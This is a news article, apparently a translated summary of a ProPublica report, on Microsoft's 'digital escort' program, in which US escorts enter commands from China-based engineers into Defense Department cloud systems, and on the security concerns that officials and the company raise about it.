Jul 16, 2025 13:55:00

Microsoft has deployed Chinese engineers to maintain systems for the Department of Defense, putting highly confidential data at risk of being hacked

As the political and economic conflict between the United States and China deepens, the U.S. government is wary of attacks by Chinese hackers under the direction of the Chinese government. However, Microsoft is using Chinese engineers to maintain systems for the Department of Defense under a little-known program within the government called 'digital escorts,' according to a report by the non-profit news organization ProPublica.

Microsoft “Digital Escorts” Could Expose Defense Dept. Data to Chinese Hackers — ProPublica

https://www.propublica.org/article/microsoft-digital-escorts-pentagon-defense-department-china-hackers

The emergence of cloud technology in the 2000s, which provides on-demand computing power and data storage over the internet, led to the adoption of the cloud in U.S. federal government operations. However, the move to the cloud means the government is ceding some authority over how information is maintained and accessed to companies like Microsoft, which poses security risks.

In response, the US government launched the Federal Information Security Management Program (FedRAMP) , a cloud service certification system, in 2011, requiring cloud companies to ensure that background checks are conducted on employees who handle highly confidential federal government data. The Department of Defense also formulated its own cloud guidelines, stipulating that employees who handle classified data must be US citizens or permanent residents.

Because Microsoft employs a global workforce from India, China, the EU, and elsewhere, it was difficult for the company to comply with these requirements. ProPublica reports that a senior program manager named Indy Crowley came up with a program called 'Digital Escort' as a way to get around FedRAMP and Department of Defense requirements.

The process for a digital escort is as follows:

1: If you need technical support for Microsoft cloud products, you submit a 'ticket' online, and Microsoft engineers in other countries, such as China, can handle the work.
2: The 'escort' living in the United States who receives the 'ticket' will hold an online meeting with the foreign engineer using Microsoft Teams.
3: The foreign engineer sends advice and commands to the escort, and the escort inputs commands and performs operations accordingly.

This program allows foreign engineers in countries like China to provide appropriate support without having to directly operate government systems.

But ProPublica points out that the escorts overseeing the operation often lack the technical knowledge of foreign engineers, including 'former military personnel with little to no coding experience' who were paid a much lower hourly rate than the government's top security officials.

This means that even if a foreign engineer sends a command with malicious code inserted and instructs the user to enter it, the escort may execute it without noticing the problem. A current escort who requested anonymity told ProPublica, 'I believe their actions are not malicious, but I don't know for sure.'

Microsoft initially worked with defense contractor Lockheed Martin's IT department to hire the escorts, but as it expanded it began relying on subcontractors such as staffing firms. ProPublica's analysis found that two Accenture subsidiaries, Insight Global and ASM Research, hire escorts.

In January 2024, Insight Global posted

a job posting for an escort with a Department of Defense security certification, with a minimum hourly wage of $18 (approximately 2,700 yen). According to an escort working at Insight Global, the company's team of about 50 escorts communicate with Microsoft engineers based in China and input hundreds of commands into government systems every month. 'People don't get escort jobs because they're software engineers, they get security certification,' one escort told ProPublica.

In a statement to ProPublica, Insight Global said, 'We assess each candidate's technical capabilities through our interview process to ensure they have the technical skills necessary for the job. The role may require a security clearance, but that's just one piece of the puzzle. The company also explained that it trains its escorts in-house, and that they also receive additional training in cyber attacks and 'insider threat awareness' as part of the government security clearance process.

Microsoft's digital escorts have received little attention within the government, with former government officials interviewed by ProPublica saying they had never heard of them. 'People literally don't know anything about digital escorts,' said Deven King, a spokesman for the Defense Information Systems Agency. 'So we don't know what to do about it.'

'If I were an agent, I would view digital escorts as extremely valuable access. We have to be very concerned,' said Harry Corker, a former senior official at the Central Intelligence Agency and the National Security Agency who served as White House national cyber director under President Joe Biden. He also said he wished his adversaries had had similar access when he was in office.

Matthew Erickson, a former Microsoft engineer who helped develop Digital Escort, acknowledged in an email to ProPublica that 'if someone ran a script called 'fix_servers.sh' and it was actually malicious, [Escort] would never notice.' However, he pointed out that the scope of systems that could be compromised is limited, and that 'there is no reason to suspect someone just because of their country of origin,' and that 'we don't see any special threat from Microsoft employees based in other countries.'

ProPublica also requested an interview with a Microsoft executive, who declined. In a statement to ProPublica, Microsoft said its employees and contractors work 'in a manner consistent with U.S. government requirements and procedures,' and that it has extensive vetting processes, training and safeguards in place.